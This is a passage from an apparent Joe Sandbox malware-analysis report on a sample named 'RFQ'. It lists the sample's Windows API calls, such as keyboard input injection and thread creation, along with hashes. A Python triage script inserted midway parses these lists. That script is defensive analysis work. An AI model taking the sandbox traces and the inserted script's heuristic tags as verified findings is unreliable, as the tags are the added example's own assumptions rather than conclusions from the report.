                                                                          APIs
                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                          • API String ID: 3300667738-0
                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu$\VH
                                                                          • API String ID: 3164766367-2432546070
                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 3850602802-3636473452
                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                          • API String ID: 3985565216-0
                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _free.LIBCMT ref: 0041F71A
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID: [B
                                                                          • API String ID: 1020059152-632041663
                                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                                          • __getptd.LIBCMT ref: 00413DBD
                                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                          • _free.LIBCMT ref: 00413E07
                                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • API String ID: 155776804-0
                                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                          APIs
                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 259663610-0
                                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                          • GetClientRect.USER32(?,?), ref: 00430364
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                          • String ID:
                                                                          • API String ID: 3220332590-0
                                                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1612042205-0
                                                                          • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                          • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: >$U$\
                                                                          • API String ID: 2666721431-237099441
                                                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 2221674350-0
                                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
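The "APIs" lists on this page are quicker to triage in bulk than by eye. The following Python script is an added example and is not part of the Joe Sandbox report or its tooling: it parses call lines in the format shown here (a few of them copied into a constructed sample string), decodes the uMsg argument of PostMessageW/SendMessageW calls into its documented WM_* name, and tags each function record with two heuristics of the example's own. The tag names (keyboard-input-injection, handle-dup-thread-create) and the triage rules are this example's assumptions, not verdicts taken from the report.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox report into
structured records and tag the API patterns a triager would look at."""
import re
from collections import Counter

# Constructed sample input: lines in the format used on this page
# (API.MODULE(args), ref: address; sub-call lines carry a prefix).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
• ___set_flsgetvalue.LIBCMT ref: 00413D20
"""

# One call line: optional sub-call prefix, API.MODULE, optional (args), ref: addr.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 window-message values, used to decode the uMsg argument.
WM_NAMES = {
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN", 0x0105: "WM_SYSKEYUP",
}


def parse_api_records(text):
    """Split text at each 'APIs' header; return one list of call dicts per block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = m.group("args")
            current.append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref").upper(),
                "subcall": m.group("sub"),   # None for a direct call
            })
    return records


def decode_message(arg):
    """Map a hex uMsg argument such as '00000100' to its WM_* name, or None."""
    try:
        return WM_NAMES.get(int(arg, 16))
    except ValueError:   # '?' means the sandbox could not resolve the value
        return None


def triage(record):
    """Tag a record with this example's assumed heuristics (not report verdicts)."""
    tags = set()
    direct = {c["api"] for c in record if c["subcall"] is None}
    if "SendInput" in direct:
        tags.add("keyboard-input-injection")
    for c in record:
        if c["api"] in ("PostMessageW", "SendMessageW") and len(c["args"]) > 1:
            if decode_message(c["args"][1]) in ("WM_KEYDOWN", "WM_CHAR", "WM_SYSKEYDOWN"):
                tags.add("keyboard-input-injection")
    if {"DuplicateHandle", "CreateThread"} <= direct:
        tags.add("handle-dup-thread-create")
    return tags


def module_histogram(records):
    """Count direct calls per imported module across all records."""
    return Counter(c["module"] for r in records for c in r if c["subcall"] is None)


if __name__ == "__main__":
    recs = parse_api_records(SAMPLE)
    for i, r in enumerate(recs):
        print(f"record {i}: {len(r)} calls, tags={sorted(triage(r))}")
    print(dict(module_histogram(recs)))
```

To run it over the real report, paste the relevant "APIs" blocks into SAMPLE or read them from a text export; records whose only tags come from sub-call lines are deliberately not counted, since those belong to the callee rather than the function being listed.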
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2037614760-0
                                                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                                          • String ID:
                                                                          • API String ID: 960795272-0
                                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                          • String ID:
                                                                          • API String ID: 4189319755-0
                                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                          • String ID:
